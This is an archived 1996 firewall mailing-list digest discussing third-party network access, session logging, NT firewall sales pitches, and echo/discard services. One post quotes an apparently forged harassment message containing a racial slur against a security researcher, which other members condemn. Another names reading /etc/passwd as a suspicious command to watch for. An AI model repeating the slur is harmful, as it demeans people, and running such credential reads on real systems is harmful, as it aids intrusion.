<9602111447.AA07236@anubis.network.com> Subject: Re: Non-company Access ?? To: peter@nmti.com (Peter da Silva) Date: Sun, 11 Feb 1996 08:52:04 -0600 (CST) Cc: allyn@allyn.com, ken@bridge.com, frankw@in.net, Dick_Wall@stratus.com, firewalls@greatcircle.com In-Reply-To: <9602110515.AA04760@sonic.nmti.com.nmti.com> from "Peter da Silva" at Feb 10, 96 11:15:33 pm X-Mailer: ELM [version 2.4 PL21] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Actually, when you have 100 terabytes of data to keep, the problem isn't usually cost, it's data management. You _could_ spend $250,000 for 100 TB of 120m DAT, and end up with lotsa little tapes to keep track of. [warning:sales-ish paragraph follows] Or, you could use a (gasp!) mainframe or other suitable large Unix-based machine, behind a good set of firewall routers and servers, and a slick tape silo (e.g. from Storage Tek) subsystem at the tail end of the flow. Rob > > This can get mightly unwieldy. Where are you going to keep those > > gigabytes of data? > > Let's say you splurge and spend $20/tape for super quality 120m DAT. > > That's $2.50/gigabyte compressed. > > Doesn't seem a problem to me. > -- Rob Peglar Network Systems Corp., a StorageTek Company robp@network.com 7600 Boone Ave N. Mpls. MN 55428 612.391.1028 612.391.1404 (fax) From firewalls-owner Sun Feb 11 10:39:12 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA11303 for firewalls-outgoing; Sun, 11 Feb 1996 10:24:13 -0800 (PST) Received: from count04.mry.scruznet.com (count04.mry.scruznet.com [204.147.227.68]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id KAA11296 for ; Sun, 11 Feb 1996 10:24:07 -0800 (PST) From: firewalls@count04.mry.scruznet.com Received: from count04.mry.scruznet.com (localhost [127.0.0.1]) by count04.mry.scruznet.com (8.7.3/8.7.1) with ESMTP id KAA05734; Sun, 11 Feb 1996 10:11:54 -0800 (PST) Message-Id: <199602111811.KAA05734@count04.mry.scruznet.com> To: Brosl Hasslacher cc: firewalls@GreatCircle.COM, firewalls@count04.mry.scruznet.com In-reply-to: Your message of "Sat, 10 Feb 1996 17:24:20 PST." <199602110124.RAA24100@azazel.sdsc.edu> Subject: WARNING POSSIBLE MAIL FORGERY IN PROGRESS Date: Sun, 11 Feb 1996 10:11:54 -0800 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Looks like we have either A mail forger working with address forgery on one of Tsutomu's machines or someone has managed to pervert Brosl's account... so tell us "Brosl" ...which is it... or someone is fooling greatcircle.com... no great trick BTW The original messages: > >Script started on Sun Feb 11 09:29:51 1996 >Sun Microsystems Inc. SunOS 5.4 Generic July 1994 >$ show 3905 >(Message inbox:3905) >Return-Path: firewalls-owner@GreatCircle.COM >Received: from relay4.UU.NET (relay4.UU.NET [192.48.96.14]) by count01.mry.scruznet.com (8.7.1/8.7.1) with ESMTP id XAA07472 for ; Sat, 10 Feb 1996 23:38:06 -0800 (PST) >Received: from miles.greatcircle.com by relay4.UU.NET with ESMTP > id QQacka21320; Sat, 10 Feb 1996 22:13:17 -0500 (EST) >Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id RAA08768 for firewalls-outgoing; Sat, 10 Feb 1996 17:25:06 -0800 (PST) >Received: from azazel.sdsc.edu (azazel.sdsc.edu [132.249.22.242]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id RAA08763 for ; Sat, 10 Feb 1996 17:25:03 -0800 (PST) >Received: (bhass@localhost) by azazel.sdsc.edu (8.7.1/8.6.10) id RAA24100 for firewalls@greatcircle.com; Sat, 10 Feb 1996 17:24:20 -0800 (PST) >Date: Sat, 10 Feb 1996 17:24:20 -0800 (PST) >From: Brosl Hasslacher >Message-Id: <199602110124.RAA24100@azazel.sdsc.edu> >To: firewalls@GreatCircle.COM >Sender: firewalls-owner@GreatCircle.COM >Precedence: bulk >Content-Type: text >Content-Length: 371 > >Greetings and Salutations from the Mitnick Liberation Front >: >It seems that once again, that slanty-eyed chink Tsutomu has made another >dollar at the expense of a hacker, Kevin Mitnick. > >In reality, Kevin Mitnick had no skills. > >But we do. > >Tsutomu's Kung-Foo is _still_ no good. > >Maybe we should read his book to be "skilled" in the art of Unix security? > >Nah. > >%dh% >(EOF):  $ exit ># whois 132.249 >San Diego Supercomputer Center (NET-SDSC2) > P.O. Box 85608 > San Diego, CA 92138 > > Netname: SDSC > Netnumber: 132.249.0.0 > > Coordinator: > Hutton, Thomas (TH60) hutton@SAND.NET > (619) 534-5136 (DSN) (Pager) (DSN) (619) 494-4938 (HME) (619) 485-8649 > > Domain System inverse mapping provided by: > > DNS1.SDSC.EDU 198.17.46.33, 198.17.47.33 > DNS2.SDSC.EDU 198.17.46.32, 198.17.47.32 > DNS2.ITD.UMICH.EDU 141.211.164.3 > UCSD.EDU 128.54.16.1, 132.239.1.1, 132.239.254.201 > > Record last updated on 25-Jul-95. > >The InterNIC Registration Services Host contains ONLY Internet Information >(Networks, ASN's, Domains, and POC's). >Please use the whois server at nic.ddn.mil for MILNET Information. ># trel   elm net 132.249.22.242 25 >Trying 132.249.22.242 ... >Connected to 132.249.22.242. >Escape character is '^]'. >220 azazel.sdsc.edu ESMTP Sendmail 8.7.1/8.6.10 ready at Sun, 11 Feb 1996 09:44:25 -0800 (PST) >quit >221 azazel.sdsc.edu closing connection >Connection closed by foreign host. ># >script done on Sun Feb 11 09:32:12 1996 From firewalls-owner Sun Feb 11 14:24:14 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA15652 for firewalls-outgoing; Sun, 11 Feb 1996 14:09:44 -0800 (PST) Received: from netcom10.netcom.com (netcom10.netcom.com [192.100.81.120]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA15637 for ; Sun, 11 Feb 1996 14:09:40 -0800 (PST) Received: by netcom10.netcom.com (8.6.12/Netcom) id OAA27320; Sun, 11 Feb 1996 14:07:09 -0800 Message-Id: <2.2.32.19960210230817.006b1cb0@netcom10.netcom.com> X-Sender: dalel@netcom10.netcom.com X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Sat, 10 Feb 1996 16:08:17 -0700 To: "Douglas M. Todd, Jr." From: Dale Lancaster Subject: Re: NT Firewalls/Web Servers Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 09:06 AM 2/7/96 -0500, Douglas M. Todd, Jr. wrote: >Does anyone know of any good NT Firewalls and Web Servers? > Just around the cornor from you is our HQ for Raptor Systems. We just released a NT based firewall. A 50 user license, list price is $6k. Check out www.raptor.com for more info. This firewall is the same as the one we have on various Unix flavors. regards :-) dale ====================================================================== Dale Lancaster Raptor Systems dalel@netcom.com "Its better to be thought a fool rather than (214) 423-6212 to speak up and remove all doubt." - Lincoln ====================================================================== From firewalls-owner Sun Feb 11 14:28:44 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA15416 for firewalls-outgoing; Sun, 11 Feb 1996 14:01:12 -0800 (PST) Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA15411 for ; Sun, 11 Feb 1996 14:01:06 -0800 (PST) Received: from pm1-02.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA00595; Sun, 11 Feb 96 16:59:48 -0500 Date: Sun, 11 Feb 96 16:59:48 -0500 Message-Id: <9602112159.AA00595@su1.in.net> X-Sender: frankw@in.net X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Ken Hardy From: Frank Willoughby Subject: Re: Non-company Access ?? Cc: firewalls@GreatCircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Regarding Ken Hardy's posting at 04:13 PM 2/9/96 -0600 and subsequent postings by others on the same thread: >In addition to some of the precautions already mentioned, on the rare >occasions that I've had to allow outside access, I've logged _all_ the >traffic involved (packet contents as well as headers) to a file on a >third machine running tcpdump or snoop. The captured sessions get >archived indefinitely, too. > >- KH Actually, there shouldn't be a need to archive the data indefinitely or chew up MB or TB of data. If the data is only logged and archived, one hasn't really accomplished much. It is important to review the data - examine what commands were given and the order they were given. If possible, have the session replayed by someone who has the competency to determine whether a command was executed which shouldn't have been or whether something looks out of place. (Did they *really* need to cat /etc/passwd or peruse your security settings?) Hmmm. Archiving the data is nice (as long as you are maintaining chain-of-custody), but if the sessions aren't reviewed, how will one know what happened, when it happened or who the alleged culprit was? Given the current workload of most sysadmins & infosec types, the chance someone reviewing every session is fairly small. My preference is avoiding problems, rather than trying to assess blame. Best Regards, Frank The opinions expressed above are of the author and may not necessarily be representative of Fortified Networks Inc. Fortified Networks Inc. - Management & Information Security Consulting Phone: (317) 573-0800 - http://www.fortified.com/fortified Home of the Free Internet Firewall Evaluation Checklist From firewalls-owner Sun Feb 11 14:54:11 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA15963 for firewalls-outgoing; Sun, 11 Feb 1996 14:20:25 -0800 (PST) Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA15957 for ; Sun, 11 Feb 1996 14:20:21 -0800 (PST) Received: from pm1-02.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA01484; Sun, 11 Feb 96 17:19:17 -0500 Date: Sun, 11 Feb 96 17:19:17 -0500 Message-Id: <9602112219.AA01484@su1.in.net> X-Sender: frankw@in.net X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: giff@congress.East.Sun.COM (Wayne Gifford - Internet Commerce Group) From: Frank Willoughby Subject: Re: Non-company Access ?? Cc: firewalls@GreatCircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 09:47 AM 2/10/96 -0500, Wayne Gifford allegedly wrote: >> >> In a few words .. can anyone tell me how your companies handle requests >> for third party access to your networks ? >> >> I get frequent requests to provide PPP or SLIP access to contractors, >> vendors, resellers, distributors, etc. for the purpose of accessing all >> sorts of applications and data bases. I also get requests to "open a >> hole in the firewall" to allow these folks to access our facilities. >> > >Look into SKIP (Simple Key management for Internet Protocols, a draft >Internet spec for doing just this sort of thing. > > >Look at http://skip.incog.com for source and a Solaris implementation > > >giff Well, sort of. Encryption is good for securing the pipe and preventing MITM (Man-In-The-Middle) attacks, but does nothing to prevent a bad guy at the other company from ravaging your systems and networks, and stealing you blind (confidential data, strategic business plans, engineering data, etc.) IMO, the best solution to this problem is avoidance. If you have no choice, and *have* to let them in, let the vendor into a system which sits by itself on an isolated LAN. If this isn't possible, and other solutions also fail, you are probably in CYA (Cover Yourself Always) Mode. Be sure to start a document trail, get the powers-to-be to sign their approval of the connection (attached to your warning of potential consequences), and sit back and hope that the unexpected doesn't happen. (Of course, you are keeping these documents off-site, right? 8^) While you're at it, you might say a prayer or two. (You'll need all the help you can get). Best Regards, Frank The opinions expressed above are of the author and may not necessarily be representative of Fortified Networks Inc. Fortified Networks Inc. - Management & Information Security Consulting Phone: (317) 573-0800 - http://www.fortified.com/fortified Home of the Free Internet Firewall Evaluation Checklist From firewalls-owner Sun Feb 11 15:24:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA17074 for firewalls-outgoing; Sun, 11 Feb 1996 15:19:07 -0800 (PST) Received: from netcom.netcom.com (netcom.netcom.com [192.100.81.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA17069 for ; Sun, 11 Feb 1996 15:19:03 -0800 (PST) Received: by netcom.netcom.com (8.6.12/Netcom) id PAA23955; Sun, 11 Feb 1996 15:14:57 -0800 Message-Id: <2.2.32.19960211001605.006d6b04@netcom.com> X-Sender: dalel@netcom.com X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Sat, 10 Feb 1996 17:16:05 -0700 To: Rabid Wombat From: Dale Lancaster Subject: Re: NT Firewalls/Web Servers -Reply Cc: Chris Jenkins , doug@fc.com, firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 09:06 PM 2/7/96 -0500, Rabid Wombat wrote: > > >On Wed, 7 Feb 1996, Chris Jenkins wrote: > >> Raptor Systems makes a one of the only firewall products I know of for NT. >> I will be gettin an eval in to test it out... > >There was a discussion concerning a product called Catapult a while back >- you might want to check the archives of this list for the past month or >two. > I've heard third hand rumors (not from my own company :-) that MS is not labelling their product as a firewall, but just a caching proxy service. Any one else heard such things? And yes, Raptor has just released the NT product. Try it out! :-) dale ====================================================================== Dale Lancaster Raptor Systems dalel@netcom.com "Its better to be thought a fool rather than (214) 423-6212 to speak up and remove all doubt." - Lincoln ====================================================================== From firewalls-owner Sun Feb 11 15:39:25 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA16952 for firewalls-outgoing; Sun, 11 Feb 1996 15:09:54 -0800 (PST) Received: from netcom10.netcom.com (netcom10.netcom.com [192.100.81.120]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA16947 for ; Sun, 11 Feb 1996 15:09:50 -0800 (PST) Received: by netcom10.netcom.com (8.6.12/Netcom) id PAA02073; Sun, 11 Feb 1996 15:06:24 -0800 Message-Id: <2.2.32.19960211000733.006eb9ac@netcom10.netcom.com> X-Sender: dalel@netcom10.netcom.com X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Sat, 10 Feb 1996 17:07:33 -0700 To: Dick_Wall@stratus.com From: Dale Lancaster Subject: Re: Non-company Access ?? Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 05:27 PM 2/8/96 -0500, Dick_Wall@stratus.com wrote: >In a few words .. can anyone tell me how your companies handle requests >for third party access to your networks ? > >I get frequent requests to provide PPP or SLIP access to contractors, >vendors, resellers, distributors, etc. for the purpose of accessing all >sorts of applications and data bases. I also get requests to "open a >hole in the firewall" to allow these folks to access our facilities. > >We don't "open holes", but we do register dial access accounts. (Too >many of them to make me feel comfortable). > >Generally, we can't restrict acces on a machine basis. The requests >typically are for access to a broad base of systems. Furthermore, once >they are on those systems, they are free to then access other machines >that the filters won't catch. > >What do you all do ?? > Just a suggestion. Raptor sells a VPN product for $99 that encrypts and authenticates all traffic between the client system and the firewall or between clients (with the firewall administratoring the connection). This is a cost effective way of handling small remote sites and not having to run dedicated lines. They can all log into a local internet provider and tunnel through the Internet securely. Checkout www.raptor.com for more info. :-) dale ====================================================================== Dale Lancaster Raptor Systems dalel@netcom.com "Its better to be thought a fool rather than (214) 423-6212 to speak up and remove all doubt." - Lincoln ====================================================================== From firewalls-owner Sun Feb 11 15:54:16 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA17043 for firewalls-outgoing; Sun, 11 Feb 1996 15:16:40 -0800 (PST) Received: from netcom10.netcom.com (netcom10.netcom.com [192.100.81.120]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA17038 for ; Sun, 11 Feb 1996 15:16:37 -0800 (PST) Received: by netcom10.netcom.com (8.6.12/Netcom) id PAA03113; Sun, 11 Feb 1996 15:13:32 -0800 Message-Id: <2.2.32.19960211001441.006bb3b4@netcom10.netcom.com> X-Sender: dalel@netcom10.netcom.com X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Sat, 10 Feb 1996 17:14:41 -0700 To: Dick_Wall@stratus.com From: Dale Lancaster Subject: Re: Non-company Access ?? Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 05:27 PM 2/8/96 -0500, Dick_Wall@stratus.com wrote: >In a few words .. can anyone tell me how your companies handle requests >for third party access to your networks ? > >I get frequent requests to provide PPP or SLIP access to contractors, >vendors, resellers, distributors, etc. for the purpose of accessing all >sorts of applications and data bases. I also get requests to "open a >hole in the firewall" to allow these folks to access our facilities. > >We don't "open holes", but we do register dial access accounts. (Too >many of them to make me feel comfortable). > >Generally, we can't restrict acces on a machine basis. The requests >typically are for access to a broad base of systems. Furthermore, once >they are on those systems, they are free to then access other machines >that the filters won't catch. > >What do you all do ?? > Just a suggestion. Raptor sells a VPN product for $99 that encrypts and authenticates all traffic between the client system and the firewall or between clients (with the firewall administratoring the connection). This is a cost effective way of handling small remote sites and not having to run dedicated lines. They can all log into a local internet provider and tunnel through the Internet securely. Checkout www.raptor.com for more info. :-) dale ====================================================================== Dale Lancaster Raptor Systems dalel@netcom.com "Its better to be thought a fool rather than (214) 423-6212 to speak up and remove all doubt." - Lincoln ====================================================================== From firewalls-owner Sun Feb 11 16:10:43 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA17994 for firewalls-outgoing; Sun, 11 Feb 1996 15:51:07 -0800 (PST) Received: from hp.com (hp.com [15.255.152.4]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id PAA17980 for ; Sun, 11 Feb 1996 15:51:02 -0800 (PST) Received: from hpwcsvp.mayfield.hp.com by hp.com with SMTP (1.37.109.16/15.5+ECS 3.3) id AA251672621; Sun, 11 Feb 1996 15:50:21 -0800 Received: from a2426kjs.nsr.hp.com by hpwcsvp.mayfield.hp.com with SMTP (1.36.108.7/15.5+ECS 3.3) id AA24637; Sun, 11 Feb 1996 15:50:14 -0800 Date: Sun, 11 Feb 1996 15:50:13 -0800 (PST) From: Kevin Steves To: david r coelho Cc: firewalls@GreatCircle.COM Subject: Re: Web browser ports? In-Reply-To: <9602091040.ZM11897@ppt.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 9 Feb 1996, david r coelho wrote: > I'm getting some incoming packets to our Web server with src > ports that are less than 1023. Are there browsers out there > that use ports below 1023? Should I allow connections of > the type: > > tcp src < 1023 dst = 80 In Chapter 14 of TCP/IP Illustrated Volume 3, Packets Found on an HTTP Server, Stevens notes that of 160,948 SYN segments received on a busy HTTP server in a 24 hour period, 14 had a source port number less than 1024. Other interesting statistics are presented, including that fact that over 10% of the SYNs contained an ISN of 0. Kevin From firewalls-owner Sun Feb 11 16:25:29 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA18865 for firewalls-outgoing; Sun, 11 Feb 1996 16:09:29 -0800 (PST) Received: from mcfeely.bsfs.org (mcfeely.bsfs.org [204.91.13.34]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id QAA18851 for ; Sun, 11 Feb 1996 16:09:23 -0800 (PST) Received: (from wombat@localhost) by mcfeely.bsfs.org (8.6.12/8.6.12) id TAA20698; Sun, 11 Feb 1996 19:05:56 -0500 Date: Sun, 11 Feb 1996 19:05:52 -0500 (EST) From: Rabid Wombat To: Brosl Hasslacher cc: firewalls@GreatCircle.COM Subject: Re: your (immature) mail In-Reply-To: <199602110130.RAA24174@azazel.sdsc.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I don't approve of your racial slurs, and this mailing list is generally comprised of people who are against the tactics you've employed. As for skill, it takes more than fancy flyin'. ---------------------------------------- Rabid Wombat wombat@mcfeely.bsfs.org ---------------------------------------- A beady-slanty-eyed diseased marsupial. From firewalls-owner Sun Feb 11 16:33:25 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA17261 for firewalls-outgoing; Sun, 11 Feb 1996 15:28:44 -0800 (PST) Received: from netcom.netcom.com (netcom.netcom.com [192.100.81.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA17253 for ; Sun, 11 Feb 1996 15:28:37 -0800 (PST) Received: by netcom.netcom.com (8.6.12/Netcom) id PAA25731; Sun, 11 Feb 1996 15:26:57 -0800 Message-Id: <2.2.32.19960211002806.006aa1c8@netcom.com> X-Sender: dalel@netcom.com X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Sat, 10 Feb 1996 17:28:06 -0700 To: firewalls@GreatCircle.COM From: Dale Lancaster Subject: Re: NT Firewalls/Web Servers -Reply Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 09:06 PM 2/7/96 -0500, Rabid Wombat wrote: > > >On Wed, 7 Feb 1996, Chris Jenkins wrote: > >> Raptor Systems makes a one of the only firewall products I know of for NT. >> I will be gettin an eval in to test it out... > >There was a discussion concerning a product called Catapult a while back >- you might want to check the archives of this list for the past month or >two. > I've heard third hand rumors (not from my own company :-) that MS is not labelling their product as a firewall, but just a caching proxy service. Any one else heard such things? And yes, Raptor has just released the NT product. Try it out! :-) dale ====================================================================== Dale Lancaster Raptor Systems dalel@netcom.com "Its better to be thought a fool rather than (214) 423-6212 to speak up and remove all doubt." - Lincoln ====================================================================== From firewalls-owner Sun Feb 11 16:39:38 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA17251 for firewalls-outgoing; Sun, 11 Feb 1996 15:28:23 -0800 (PST) Received: from netcom.netcom.com (netcom.netcom.com [192.100.81.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA17246 for ; Sun, 11 Feb 1996 15:28:17 -0800 (PST) Received: by netcom.netcom.com (8.6.12/Netcom) id PAA25371; Sun, 11 Feb 1996 15:24:16 -0800 Message-Id: <2.2.32.19960211002525.006daf90@netcom.com> X-Sender: dalel@netcom.com X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Sat, 10 Feb 1996 17:25:25 -0700 To: Rabid Wombat From: Dale Lancaster Subject: Re: NT Firewalls/Web Servers -Reply Cc: Chris Jenkins , doug@fc.com, firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 09:06 PM 2/7/96 -0500, Rabid Wombat wrote: > > >On Wed, 7 Feb 1996, Chris Jenkins wrote: > >> Raptor Systems makes a one of the only firewall products I know of for NT. >> I will be gettin an eval in to test it out... > >There was a discussion concerning a product called Catapult a while back >- you might want to check the archives of this list for the past month or >two. > I've heard third hand rumors (not from my own company :-) that MS is not labelling their product as a firewall, but just a caching proxy service. Any one else heard such things? And yes, Raptor has just released the NT product. Try it out! :-) dale ====================================================================== Dale Lancaster Raptor Systems dalel@netcom.com "Its better to be thought a fool rather than (214) 423-6212 to speak up and remove all doubt." - Lincoln ====================================================================== From firewalls-owner Sun Feb 11 16:46:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA17269 for firewalls-outgoing; Sun, 11 Feb 1996 15:28:59 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA17264 for ; Sun, 11 Feb 1996 15:28:52 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-960123) id PAA07140; Sun, 11 Feb 1996 15:25:17 -0800 Received: from netcom.netcom.com(192.100.81.100) by mycroft via smap (V1.3mjr) id sma007136; Sun Feb 11 15:24:44 1996 Received: by netcom.netcom.com (8.6.12/Netcom) id PAA25363; Sun, 11 Feb 1996 15:24:13 -0800 Message-Id: <2.2.32.19960211002522.006d6664@netcom.com> X-Sender: dalel@netcom.com X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Sat, 10 Feb 1996 17:25:22 -0700 To: Dick_Wall@stratus.com From: Dale Lancaster Subject: Re: Non-company Access ?? Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 05:27 PM 2/8/96 -0500, Dick_Wall@stratus.com wrote: >In a few words .. can anyone tell me how your companies handle requests >for third party access to your networks ? > >I get frequent requests to provide PPP or SLIP access to contractors, >vendors, resellers, distributors, etc. for the purpose of accessing all >sorts of applications and data bases. I also get requests to "open a >hole in the firewall" to allow these folks to access our facilities. > >We don't "open holes", but we do register dial access accounts. (Too >many of them to make me feel comfortable). > >Generally, we can't restrict acces on a machine basis. The requests >typically are for access to a broad base of systems. Furthermore, once >they are on those systems, they are free to then access other machines >that the filters won't catch. > >What do you all do ?? > Just a suggestion. Raptor sells a VPN product for $99 that encrypts and authenticates all traffic between the client system and the firewall or between clients (with the firewall administratoring the connection). This is a cost effective way of handling small remote sites and not having to run dedicated lines. They can all log into a local internet provider and tunnel through the Internet securely. Checkout www.raptor.com for more info. :-) dale ====================================================================== Dale Lancaster Raptor Systems dalel@netcom.com "Its better to be thought a fool rather than (214) 423-6212 to speak up and remove all doubt." - Lincoln ====================================================================== From firewalls-owner Sun Feb 11 20:24:13 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id UAA28298 for firewalls-outgoing; Sun, 11 Feb 1996 20:16:53 -0800 (PST) Received: from gatekeeper.Bridge.COM (gatekeeper.bridge.com [167.76.159.11]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id UAA28293 for ; Sun, 11 Feb 1996 20:16:49 -0800 (PST) Received: (from mailproxy@localhost) by gatekeeper.Bridge.COM (8.6.12/8.6.9) id WAA16936; Sun, 11 Feb 1996 22:08:38 -0600 Received: from ignatz.bridge.com(167.76.24.6) by gatekeeper.Bridge.COM via smap (V1.0mjr) id sma016934; Sun Feb 11 22:08:24 1996 Received: from ignatz (ignatz.bridge.com) by ignatz.bridge.com with SMTP id AA27030 (5.67b/IDA-1.5); Sun, 11 Feb 1996 22:22:52 -0600 Date: Sun, 11 Feb 1996 22:22:52 -0600 (CST) From: Ken Hardy X-Sender: ken@ignatz To: Frank Willoughby Cc: firewalls@GreatCircle.com Subject: Re: Non-company Access ?? In-Reply-To: <9602112159.AA00595@su1.in.net> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Sun, 11 Feb 1996, Frank Willoughby wrote: > chew up MB or TB of data. If the data is only logged and archived, one > hasn't really accomplished much. > > It is important to review the data - examine what commands were given > and the order they were given. If possible, have the session replayed > by someone who has the competency to determine whether a command was Thought that went without saying, which is why I went without saying it. :) Probably good to bring it out, though. > Archiving the data is nice (as long as you are maintaining chain-of-custody), > but if the sessions aren't reviewed, how will one know what happened, when > it happened or who the alleged culprit was? If questions later arise, possibly due to problems of undetermined orgin, it seems it would be nice to have the session transcript to prove innocense as well as guilt; archive it even after examining it and giving your nihil obstat. I just leave it on my filesystem until it's made it onto the one backup a week that gets archived. > Given the current workload of most sysadmins & infosec types, the chance > someone reviewing every session is fairly small. Could definitely be a problem, but so far it's been a very rare phenonemon here, so I haven't reached saturation, yet. - KH From firewalls-owner Sun Feb 11 21:54:35 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id VAA01189 for firewalls-outgoing; Sun, 11 Feb 1996 21:50:09 -0800 (PST) Received: from myall.awadi.com.au (myall.awadi.com.AU [150.207.2.65]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id VAA01184 for ; Sun, 11 Feb 1996 21:50:03 -0800 (PST) Received: from bunya.awadi ([150.207.2.63]) by myall.awadi.com.au (8.7.1/8.7.1) with SMTP id QAA08165; Mon, 12 Feb 1996 16:18:18 +1030 (CST) Received: from mallee.awadi by bunya.awadi (5.x/SMI-SVR4) id AA04178; Mon, 12 Feb 1996 16:17:21 +1030 Received: by mallee.awadi (SMI-8.6/SMI-SVR4) id QAA13091; Mon, 12 Feb 1996 16:17:18 +1030 From: blymn@awadi.com.au (Brett Lymn) Message-Id: <199602120547.QAA13091@mallee.awadi> Subject: Re: anybody know of any vulnerabilities with "echo" To: joey@gxl.woodtech.com (Joe Smith) Date: Mon, 12 Feb 1996 16:17:16 +1030 (CST) Cc: firewalls@greatcircle.com In-Reply-To: from "Joe Smith" at Feb 10, 96 00:27:25 am X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk According to Joe Smith: > >What is the loss of disabling echo? Or discard for that matter. > For an internet machine, not much I suppose but if you are running a Sun shop and remove discard from your boot server then do not expect your Sun diskless clients to reboot from power-up. We had this problem a while ago and it was driving me nuts, the discard service was commented out for another bit of software to run. Suddenly we could not get our diskless clients to boot when they were turned on. They would just hang, getting nowhere, if you interrupted the hang and type boot they would come up ok. Putting the discard service back into the inet.conf fixed the problem. -- Brett Lymn, Computer Systems Administrator, AWA Defence Industries =============================================================================== "Upgrading your memory gives you MORE RAM!" - ad in MacWAREHOUSE catalogue. From firewalls-owner Sun Feb 11 22:39:13 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id WAA02041 for firewalls-outgoing; Sun, 11 Feb 1996 22:34:01 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id WAA02036 for ; Sun, 11 Feb 1996 22:33:57 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-960123) id WAA08110; Sun, 